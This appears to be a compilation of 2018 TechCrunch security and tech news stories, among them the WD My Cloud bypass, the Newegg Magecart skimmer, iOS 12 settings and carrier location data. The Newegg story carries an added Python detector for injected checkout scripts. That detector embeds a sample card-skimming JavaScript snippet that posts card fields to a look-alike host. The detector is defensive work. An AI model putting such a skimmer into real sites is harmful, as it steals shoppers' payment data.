Password bypass flaw in Western Digital My Cloud drives puts data at risk

A security researcher has published details of a vulnerability in a popular cloud storage drive after the company failed to issue security patches for over a year.
Remco Vermeulen found a privilege escalation bug in Western Digital’s My Cloud devices, which he said allows an attacker to bypass the admin password on the drive, gaining “complete control” over the user’s data.
The exploit works because the drive’s web-based dashboard doesn’t properly check a user’s credentials before granting access to functions that should require administrator-level access.
The bug was “easy” to exploit, Vermeulen told TechCrunch in an email, and was remotely exploitable if a My Cloud device allows remote access over the internet — which thousands of devices do. He posted a proof-of-concept video on Twitter.
Details of the bug were also independently found by another security team, which released its own exploit code.
Vermeulen reported the bug over a year ago, in April 2017, but said the company stopped responding. Normally, security researchers give 90 days for a company to respond, in line with industry-accepted responsible disclosure guidelines.
After he noticed that WD had updated the My Cloud firmware in the meantime without fixing the vulnerability he reported, he decided to publish his findings.
A year later, WD still hasn’t released a patch.
The company confirmed that it knows of the vulnerability but did not say why it took more than a year to issue a fix. “We are in the process of finalizing a scheduled firmware update that will resolve the reported issue,” a spokesperson said, which will arrive “within a few weeks.”
WD said that several of its My Cloud products are vulnerable — including the EX2, EX4 and Mirror, but not My Cloud Home.
In the meantime, Vermeulen said that there’s no fix and that users have to “just disconnect” the drive altogether if they want to keep their data safe.

Source: Gadgets – techcrunch

Hackers stole customer credit cards in Newegg data breach

Newegg is clearing up its website after a month-long data breach.
Hackers injected 15 lines of card skimming code on the online retailer’s payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name — likely to avoid detection. The server even used an HTTPS certificate to blend in.
The skimmer was written to run on both the desktop and mobile versions of the checkout page, though it’s unclear whether mobile customers were actually affected.
The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings.
Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it’s not known precisely how many customers completed transactions during the period.
In an email to customers, Newegg chief executive Danny Lee said the company has “not yet determined which customer accounts may have been affected.” When reached, a Newegg spokesperson did not immediately comment.
Klijnsma called the incident “another well-disguised attack” that looked near-identical to the recent British Airways credit card breach, and earlier, the Ticketmaster breach. Like that breach, RiskIQ attributed the Newegg credit card theft to the Magecart group, a collective of hackers that carry out targeted attacks against vulnerable websites.
The code used in both skimming attacks was near identical, according to the research.
“The breach of Newegg shows the true extent of Magecart operators’ reach,” said Klijnsma. “These attacks are not confined to certain geolocations or specific industries—any organization that processes payments online is a target.”
Like previous card skimming campaigns, he said that the hackers “integrated with the victim’s payment system and blended with the infrastructure and stayed there as long as possible.”
Anyone who entered their credit card data during the period should immediately contact their banks.
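A detection check for the kind of injection described above, added here as an example (it is not RiskIQ’s or Volexity’s tooling and not the actual Newegg skimmer): it parses a checkout page, lists every host that scripts are loaded from or send data to, flags anything outside a first-party allowlist, and marks a host whose registrable label is within a couple of edits of the first-party name as a look-alike. The allowlist, the host names and the inline snippet are constructed for the example.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Set
from urllib.parse import urlparse

# Hosts the checkout page is allowed to load code from or send data to (assumed for this example).
FIRST_PARTY: Set[str] = {"example-shop.com", "static.example-shop.com", "pay.example-shop.com"}

URL_RE = re.compile(r"""https?://[^\s'"()<>`]+""")
# Browser APIs a skimmer typically uses to exfiltrate captured form fields.
SUSPICIOUS_API_RE = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=")


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and the bodies of inline scripts."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_script = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot typo-squatted domain labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _registrable_label(host: str) -> str:
    # Second-level label only; a real deployment would consult the Public Suffix List (assumption).
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else host.lower()


def is_lookalike(host: str, first_party: Set[str], max_distance: int = 2) -> bool:
    """True when a non-allowlisted host's label is within max_distance edits of a first-party label."""
    if host.lower() in first_party:
        return False
    label = _registrable_label(host)
    return any(_edit_distance(label, _registrable_label(fp)) <= max_distance for fp in first_party)


def audit_checkout_page(html: str, first_party: Set[str] = FIRST_PARTY) -> List[Dict[str, object]]:
    """Return every non-first-party host referenced by scripts on the page, with a look-alike flag."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings: List[Dict[str, object]] = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host.lower() not in first_party:
            findings.append({"kind": "external-script", "host": host, "lookalike": is_lookalike(host, first_party)})
    for body in parser.inline:
        hosts = {urlparse(u).hostname for u in URL_RE.findall(body)}
        hosts.discard(None)
        exfil_api = bool(SUSPICIOUS_API_RE.search(body))
        for host in hosts:
            if host.lower() not in first_party:
                findings.append({"kind": "inline-exfil" if exfil_api else "inline-url",
                                 "host": host, "lookalike": is_lookalike(host, first_party)})
    return findings


# Constructed sample page: one legitimate first-party script and one injected inline snippet that
# reads the card fields and posts them to a look-alike host. Not the real Newegg code.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<script src="https://static.example-shop.com/checkout.js"></script>
<form id="payment"><input name="cc_number"><input name="cc_cvv"><button>Pay</button></form>
<script>
document.querySelector('#payment button').addEventListener('click', function () {
  var d = {}; document.querySelectorAll('#payment input').forEach(function (i) { d[i.name] = i.value; });
  var x = new XMLHttpRequest(); x.open('POST', 'https://examp1e-shop.com/collect'); x.send(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(f)
```

Run against a live page, this kind of check belongs in a scheduled job that fetches the checkout page as a browser would and diffs the result against the last known-good set of hosts; the regex only sees absolute `http(s)://` URLs, so protocol-relative or obfuscated (string-concatenated) targets need a proper JavaScript parser or a runtime content security policy report to catch.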

Source: Gadgets – techcrunch

Five security settings in iOS 12 you should change right now

iOS 12, Apple’s latest mobile software for iPhone and iPad, is finally out. The new software packs in a bunch of new security and privacy features you’ve probably already heard about.

Here’s what you need to do to take advantage of the new settings and lock down your device.

1. Turn on USB Restricted Mode to make hacking more difficult

This difficult-to-find new feature blocks data connections over the Lightning port, whether from USB cables, headphones or any other accessory, once your iPhone or iPad has been locked for more than an hour (the device still charges). That prevents police and hackers alike from using forensic tools to bypass your lock screen passcode and extract your data.

Go to Settings > Touch ID & Passcode and type in your passcode. Then scroll down to USB Accessories and make sure the setting is Off, so that accessories are not permitted while the device is locked. (On an iPhone X, check your Face ID & Passcode settings instead.)

2. Make sure automatic iOS updates are turned on

Every time your iPhone or iPad updates, it comes with a slew of security patches to prevent crashes or data theft. Yet, how often do you update your phone? Most don’t bother unless it’s a major update. Now, iOS 12 will update your device behind the scenes, saving you downtime. Just make sure you switch it on.

Go to Settings > General > Software Update and turn on automatic updates.

3. Set a stronger device passcode

iOS has gotten better in recent years with passcodes. For years, the default was a four-digit code; now it’s six digits. That makes it far more difficult to run through every combination, an attack known as brute-forcing.

But did you know that you can set a number-only code of any length? Eight digits, twelve, even more, and it keeps the number keypad on the lock screen so you don’t have to fiddle around with the keyboard.

Go to Settings > Touch ID & Passcode and enter your passcode. Then tap Change Passcode and, under Passcode Options, choose Custom Numeric Code.

4. Now, switch on two-factor authentication

Two-factor is one of the best ways to keep your account safe. If someone steals your password, they still need your phone to break into your account. For years, two-factor has been cumbersome and annoying. Now, iOS 12 has a new feature that auto-fills the code from the text message, so it takes the frustrating step out of the equation, leaving you no excuse.

You may be asked to switch on two-factor when you set up your phone. You can also go to Settings and tap your name, then go to Password & Security. Just tap Turn on Two-Factor Authentication and follow the prompts.

5. While you’re here… change your reused passwords

iOS 12’s password manager has a new feature: password auditing. If it finds you’ve used the same password on multiple sites, it will warn you and advise you to change those passwords. That defends against password reuse attacks (known as “credential stuffing”) that hackers use to break into multiple sites and services using the same username and password.

Go to Settings > Passwords & Accounts > Website & App Passwords and enter your passcode. You’ll see a small warning symbol next to each account that recognizes a reused password. One tap of the Change Password on Website button and you’re done.

Source: Mobile – TechCrunch

Security researchers found a way to hack into the Amazon Echo

Hackers at DefCon have exposed new security concerns around smart speakers. Tencent’s Wu HuiYu and Qian Wenxiang spoke at the security conference with a presentation called Breaking Smart Speakers: We are Listening to You, explaining how they hacked into an Amazon Echo speaker and turned it into a spy bug.
The hack involved a modified Amazon Echo, which had parts swapped out, including some that had been soldered on. The modified Echo was then used to hack into other, non-modified Echos by connecting both the hackers’ Echo and a regular Echo to the same LAN.
This allowed the hackers to turn their own, modified Echo into a listening bug, relaying audio from the other Echo speakers without those speakers indicating that they were transmitting.
This method was very difficult to execute, but represents an early step in exploiting Amazon’s increasingly popular smart speaker.
The researchers notified Amazon of the exploit before the presentation, and Amazon has already pushed a patch, according to Wired.
Still, the presentation demonstrates how one Echo, with malicious firmware, could potentially alter a group of speakers when connected to the same network, posing concerns with the idea of Echos in hotels.
Wired explained how the networking feature of the Echo allowed for the hack:
If they can then get that doctored Echo onto the same Wi-Fi network as a target device, the hackers can take advantage of a software component of Amazon’s speakers, known as Whole Home Audio Daemon, that the devices use to communicate with other Echoes in the same network. That daemon contained a vulnerability that the hackers found they could exploit via their hacked Echo to gain full control over the target speaker, including the ability to make the Echo play any sound they chose, or more worryingly, silently record and transmit audio to a faraway spy.
An Amazon spokesperson told Wired that “customers do not need to take any action as their devices have been automatically updated with security fixes,” adding that “this issue would have required a malicious actor to have physical access to a device and the ability to modify the device hardware.”
To be clear, the actor would only need physical access to their own Echo, plus a way to get it onto the same network as the target, to execute the hack.
While Amazon has dismissed concerns that its voice activated devices are monitoring you, hackers at this year’s DefCon showed that, with a tampered device on the same network, they could be made to.

Source: Gadgets – techcrunch

Dixons Carphone says millions more customers affected by 2017 breach

A Dixons Carphone data breach that was disclosed earlier this summer was worse than initially reported. The company is now saying that personal data of 10 million customers could also have been accessed when its systems were hacked.
The European electronics and telecoms retailer believes its systems were accessed by unknown and unauthorized person/s in 2017, although it only disclosed the breach in June, after discovering it during a review of its security systems.
Last month it said 5.9M payment cards and 1.2M customer records had been accessed. But with its investigation into the breach “nearing completion”, it now says approximately 10M records containing personal data (but no financial information) may have been accessed last year — in addition to the 5.9M compromised payment cards it disclosed last month.
“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” the company said in a statement.
In terms of what personal data the 10M records contained, a Dixons Carphone spokeswoman told us: “This continues to relate to personal data, and the types of data that may have been accessed are, for example, name, address or email address.”
The company says it’s taking the precaution of contacting all its customers — to apologize and advise them of “protective steps to minimize the risk of fraud”.
It adds it has no evidence that the unauthorized access is continuing, having taken steps to secure its systems when the breach was discovered last month, saying: “We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring and testing.”
Commenting in a statement, Dixons Carphone CEO, Alex Baldock, added: “Since our data security review uncovered last year’s breach, we’ve been working around the clock to put it right. That’s included closing off the unauthorised access, adding new security measures and launching an immediate investigation, which has allowed us to build a fuller understanding of the incident that we’re updating on today.
“Again, we’re disappointed in having fallen short here, and very sorry for any distress we’ve caused our customers. I want to assure them that we remain fully committed to making their personal data safe with us.”
Back in 2015, Carphone Warehouse, a mobile division of Dixons Carphone, also suffered a hack which affected around 3M people. And in January the company was fined £400k by the ICO as a consequence of that earlier breach.
Since then new European Union regulations (GDPR) have come into force which greatly raise the maximum penalties which regulators can impose for serious data breaches.
Last month, following Dixon’s disclosure of the latest breach, the UK’s data watchdog, the ICO, told us it was liaising with the National Cyber Security Centre, the Financial Conduct Authority and other relevant agencies to ascertain the details and impact on customers.
Of the 5.9M payment cards which Dixons disclosed last month as having been compromised, it said the vast majority had been protected by chip and PIN technology. But around 105,000 lacked that protection, so Dixons said at the time those could have been compromised.
It’s the additional 1.2M records containing non-financial personal data — such as name, address or email address — that have been revised upwards now, to ~10M records, which constitutes almost half the Group’s customer base in the UK and Ireland.
The spokeswoman told us the Group has approximately 22M customers in the region.
https://www.ncsc.gov.uk/guidance/ncsc-advice-dixons-carphone-plc-customers

Source: Gadgets – techcrunch

Instagram is building non-SMS 2-factor auth to thwart SIM hackers

Hackers can steal your phone number by reassigning it to a different SIM card, use it to reset your passwords, steal your Instagram and other accounts and sell them for bitcoin. As detailed in a harrowing Motherboard article today, Instagram accounts are especially vulnerable because the app only offers two-factor authentication through SMS that delivers a password reset or login code via text message.

But now Instagram has confirmed to TechCrunch that it’s building a non-SMS two-factor authentication system that works with security apps like Google Authenticator or Duo. Those apps generate a one-time login code from a secret stored on your phone, so the code can’t be generated on a different phone even if your number is ported to a hacker’s SIM card.

Buried in the Instagram Android app’s APK code is a prototype of the upgraded 2FA feature, discovered by frequent TechCrunch tipster Jane Manchun Wong. Her work has led to confirmed TechCrunch scoops on Instagram Video Calling, Usage Insights, soundtracks for Stories and more.

When presented with the screenshots, an Instagram spokesperson told TechCrunch that yes, it is working on the non-SMS 2FA feature, saying, “We’re continuing to improve the security of Instagram accounts, including strengthening 2-factor authentication.”

Instagram actually lacked any two-factor protection until 2016 when it already had 400 million users. In November 2015, I wrote a story titled “Seriously. Instagram Needs Two-Factor Authentication.” A friend and star Instagram stop-motion animation creator Rachel Ryle had been hacked, costing a lucrative sponsorship deal. The company listened. Three months later, the app began rolling out basic SMS-based 2FA.

But since then, SIM porting has become a much more common problem. Hackers typically call a mobile carrier and use social engineering tactics to convince them they’re you, or bribe an employee to help, and then change your number to a SIM card they control. Whether they’re hoping to steal intimate photos, empty cryptocurrency wallets or sell desirable social media handles like @t or @Rainbow as Motherboard reported, there are plenty of incentives to try a SIM porting attack. This article outlines how you can take steps to protect your phone number.

Hopefully as knowledge of this hacking technique becomes more well-known, more apps will introduce non-SMS 2FA, mobile providers will make it tougher to port numbers and users will take more steps to safeguard their accounts. As our identities and assets increasingly go digital, it’s pin codes and authenticator apps, not just deadbolts and home security systems, that must become a part of our everyday lives.

Source: Mobile – TechCrunch

Court victory legalizes 3D-printable gun blueprints

A multi-year legal battle over the ability to distribute computer models of gun parts and replicate them in 3D printers has ended in defeat for government authorities who sought to prevent the practice. Cody Wilson, the gunmaker and free speech advocate behind the lawsuit, now intends to expand his operations, providing printable gun blueprints to all who desire them.
The longer story of the lawsuit is well told by Andy Greenberg over at Wired, but the decision is eloquent on its own. The fundamental question is whether making 3D models of gun components available online is covered by the free speech rights granted by the First Amendment.
This is a timely but complex conflict because it touches on two themes that happen to be, for many, ethically contradictory. Arguments for tighter restrictions on firearms are, in this case, directly opposed to arguments for the unfettered exchange of information on the internet. It’s hard to advocate for both here: restricting firearms and restricting free speech are one and the same.
That at least seems to be the conclusion of the government lawyers, who settled Wilson’s lawsuit after years of court battles. In a copy of the settlement provided to me by Wilson, the U.S. government agrees to exempt “the technical data that is the subject of the Action” from legal restriction. The modified rules should appear in the Federal Register soon.
What does this mean? It means that a 3D model that can be used to print the components of a working firearm is legal to own and legal to distribute. You can likely even print it and use the product — you just can’t sell it. There are technicalities to the law here (certain parts are restricted, but can be sold in an incomplete state, etc.), but the implications as regards the files themselves seem clear.
Wilson’s original vision, which he is now pursuing free of legal obstacles, is a repository of gun models, called DEFCAD, much like any other collection of data on the web, though naturally considerably more dangerous and controversial.
“I currently have no national legal barriers to continue or expand DEFCAD,” he wrote in an email to TechCrunch. “This legal victory is the formal beginning to the era of downloadable guns. Guns are as downloadable as music. There will be streaming services for semi-automatics.”
The concepts don’t map perfectly, no doubt, but it’s hard to deny that with the success of this lawsuit, there are few legal restrictions to speak of on the digital distribution of firearms. Even before it, there were few technical restrictions: just as you could download MP3s on Napster in 2002, you can download a gun file today.
Gun control advocates will no doubt argue that greater availability of lethal weaponry is the opposite of what is needed in this country. But others will point out that in a way this is a powerful example of how liberally free speech can be defined. It’s important to note that both of these things can be true.
This court victory settles one case, but marks the beginning of many others. “I have promoted my values for years with great care and diligence,” Wilson wrote. It’s hard to disagree with that. Those whose values differ are free to pursue them in their own way; perhaps they too will be awarded victories of this scale.

Source: Gadgets – techcrunch

Apple releases new iPad, FaceID ads

Apple has released a handful of new ads promoting the iPad’s portability and convenience over both laptops and traditional paper solutions. The 15-second ads focus on how the iPad can make even the most tedious things — travel, notes, paperwork, and ‘stuff’ — just a bit easier.
Three out of the four spots show the sixth-generation iPad, which was revealed at Apple’s education event in March, and which offers a lower-cost ($329 in the U.S.) option with Pencil support.
The ads were released on Apple’s international YouTube channels (UAE, Singapore, and United Kingdom).

This follows another 90-second ad released yesterday, focusing on FaceID. The commercial shows a man in a gameshow-type setting asked to remember the banking password he created earlier that morning. He struggles for an excruciating amount of time before realizing he can access the banking app via FaceID.

There has been some speculation that FaceID may be incorporated into some upcoming models of the iPad, though we’ll have to wait until Apple’s next event (likely in September) to find out for sure.

Source: Gadgets – techcrunch

Verizon and others call a conditional halt on sharing location with data brokers

Verizon is cutting off access to its mobile customers’ real-time locations to two third-party data brokers “to prevent misuse of that information going forward.” The company announced the decision in a letter sent to Senator Ron Wyden (D-OR), who along with others helped reveal improper usage and poor security at these location brokers. It is not, however, getting out of the location-sharing business altogether.

(Update: AT&T and Sprint have also begun the process of ending their location aggregation services, with a caveat described below.)

Verizon sold bulk access to its customers’ locations to the brokers in question, LocationSmart and Zumigo, which then turned around and resold that data to dozens of other companies. This isn’t necessarily bad — there are tons of times when location is necessary to provide a service the customer asks for, and supposedly that customer would have to okay the sharing of that data. (Disclosure: Verizon owns Oath, which owns TechCrunch. This does not affect our coverage.)

That doesn’t seem to have been the case at LocationSmart customer Securus, which was selling its data directly to law enforcement so they could find mobile customers quickly and without all that fuss about paperwork and warrants. And then it was found that LocationSmart had exposed an API that allowed anyone to request mobile locations freely and anonymously, and without collecting consent.

When these facts were revealed by security researchers and Sen. Wyden, Verizon immediately looked into it, they reported in a letter sent to the Senator.

“We conducted a comprehensive review of our location aggregator program,” wrote Verizon CTO Karen Zacharia. “As a result of this review, we are initiating a process to terminate our existing agreements for the location aggregator program.”

“We will not enter into new location aggregation arrangements unless and until we are comfortable that we can adequately protect our customers’ location data through technological advancements and/or other practices,” she wrote later in the letter. In other words, the program is on ice until it can be secured.

Although Verizon claims to have “girded” the system with “mechanisms designed to protect against misuse of our customers’ location data,” the abuses in question clearly slipped through the cracks. Perhaps most notable is the simple fact that Verizon itself does not seem to need to be informed whether a customer has consented to having their location polled. That collection is the responsibility of “the aggregator or corporate customer.”

In other words, Verizon doesn’t need to ask the customer, and the company it sells the data to wholesale doesn’t need to ask the customer — the requirement devolves to the company buying access from the wholesaler. In Securus’s case, it had abstracted things one step further, allowing law enforcement full access when it said it had authority to do so, but apparently without checking, AT&T wrote in its own letter to Sen. Wyden.

And there were 75 other corporate customers. Don’t worry, someone is keeping track of them. Right?

These processes are audited, Verizon wrote, but apparently not an audit that finds things like the abuse by Securus or a poorly secured API. Perhaps how this happened is among the “number of internal questions” raised by the review.

When asked for comment, a Verizon representative offered the following statement:

When these issues were brought to our attention, we took immediate steps to stop it. Customer privacy and security remain a top priority for our customers and our company. We stand by that commitment to our customers.

And indeed while the program itself appears to have been run with a laxity that should be alarming to all those customers for whom Verizon claims to be so concerned, some of the company’s competitors have yet to take similar action. AT&T, T-Mobile and Sprint were also named by LocationSmart as partners. Their own letters to Sen. Wyden stressed that their systems were similar to the others, with similar safeguards (that were similarly eluded).

In a press release announcing that his pressure on Verizon had borne fruit, Sen. Wyden called on the others to step up:

Verizon deserves credit for taking quick action to protect its customers’ privacy and security. After my investigation and follow-up reports revealed that middlemen are selling Americans’ location to the highest bidder without their consent, or making it available on insecure web portals, Verizon did the responsible thing and promptly announced it was cutting these companies off. In contrast, AT&T, T-Mobile, and Sprint seem content to continue selling their customers’ private information to these shady middle men, Americans’ privacy be damned.

AT&T actually announced that it is ending its agreements as well, after Sen. Wyden’s call to action was published, and Sprint followed shortly afterwards. AT&T said it “will be ending [its] work with these aggregators for these services as soon as is practical in a way that preserves important, potential lifesaving services like emergency roadside assistance.” Sprint stopped working with LocationSmart last month and is now “beginning the process of terminating its current contracts with data aggregators to whom we provide location data.”

What’s missing from these statements? Among other things: what and how many companies they’re working with, whether they’ll pursue future contracts, and what real changes will be made to prevent future problems like this. Since they’ve been at this for a long time and have had a month to ponder their next course of actions, I don’t think it’s unreasonable to expect more than a carefully worded statement about “these aggregators for these services.”

T-Mobile CEO John Legere tweeted that the company “will not sell customer location data to shady middlemen.” Of course, that doesn’t really mean anything. I await substantive promises from the company pertaining to this “pledge.”

The FCC, meanwhile, has announced that it is looking into the issue — with the considerable handicap that Chairman Ajit Pai represented Securus back in 2012 when he was working as a lawyer. Sen. Wyden has called on him to recuse himself, but that has yet to happen.

I’ve asked Verizon for further clarification on its arrangements and plans, specifically whether it has any other location-sharing agreements in place with other companies. These aren’t, after all, the only players in the game.

Source: Mobile – TechCrunch

Purdue’s PHADE technology lets cameras ‘talk’ to you

It’s become almost second nature to accept that cameras everywhere — from streets, to museums and shops — are watching you, but now they may be able to communicate with you, as well. New technology from Purdue University computer science researchers has made this dystopian prospect a reality in a new paper published today. But, they argue, it’s safer than you might think.
The system is called PHADE, which allows for something called “private human addressing,” where camera systems and individual cell phones can communicate without transmitting any device identifier, like an IP or MAC address. Instead, the technology uses a person’s motion pattern as the address code. That way, even if a hacker intercepts a message, it isn’t tied to a device identity that could reveal the person’s physical location.
Imagine you’re strolling through a museum and an unfamiliar painting catches your eye. The docents are busy with a tour group far across the gallery and you didn’t pay extra for the clunky recorder and headphones for an audio tour. While pondering the brushwork you feel your phone buzz, and suddenly a detailed description of the artwork and its painter is in the palm of your hand.
To achieve this effect, researchers use an approach similar to the kind of directional audio experience you might find at theme parks. Through processing the live video data, the technology is able to identify the individual motion patterns of pedestrians and when they are within a pertinent range — say, in front of a painting. From there they can broadcast a packet of information linked to the motion address of the pedestrian. When the user’s phone identifies that the motion address matches their own, the message is received.
While this tech can be used to better inform the casual museum-goer, the researchers also believe it has a role in protecting pedestrians from crime in their area.
“Our system serves as a bridge to connect surveillance cameras and people,” He Wang, a co-creator of the technology and assistant professor of computer science, said in a statement. “[It can] be used by government agencies to enhance public safety [by deploying] cameras in high-crime or high-accident areas and warn[ing] specific users about potential threats, such as suspicious followers.”
While the benefits of an increasingly interconnected world are still being debated and critiqued daily, there might just be an upside to knowing a camera’s got its eye on you.

Source: Gadgets – techcrunch